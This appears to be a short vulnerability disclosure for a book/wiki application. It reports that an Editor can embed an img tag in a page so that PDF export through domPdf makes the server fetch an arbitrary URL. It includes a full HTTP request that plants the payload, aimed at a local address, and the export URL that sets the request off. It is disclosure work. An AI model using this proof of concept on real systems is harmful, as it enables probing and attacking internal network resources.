tag with "src" property pointing to any external or internal resource. Exporting this page using default domPdf will result in firing request from server side. ...">
User with “Editor” rights can create a special book page containing <img> tag with “src” property pointing to any external or internal resource. Exporting this page using default domPdf will result in firing request from server side.
Updating page with malicious payload in html
parameter
POST /books/<BOOK>/page/<PAGE> HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:91.0) Gecko/20100101 Firefox/91.0
Content-Type: application/x-www-form-urlencoded
Cookie: <COOKIE>
_token=<CSRF-TOKEN>&_method=PUT&summary=&name=123&html=<img src="http://127.0.0.1:7654/test.jpg">&tags%5B0%5D%5Bname%5D=&tags%5B0%5D%5Bvalue%5D=&tags%5Brandrowid%5D%5Bname%5D=&tags%5Brandrowid%5D%5Bvalue%5D=&attachment_link_uploaded_to=1&attachment_link_name=&attachment_link_url=&template=false
Exporting page to pdf
http://<HOST>/books/<BOOK>/page/<PAGE>/export/pdf
An attacker can use this vulnerability to exploit other resources in internal perimeter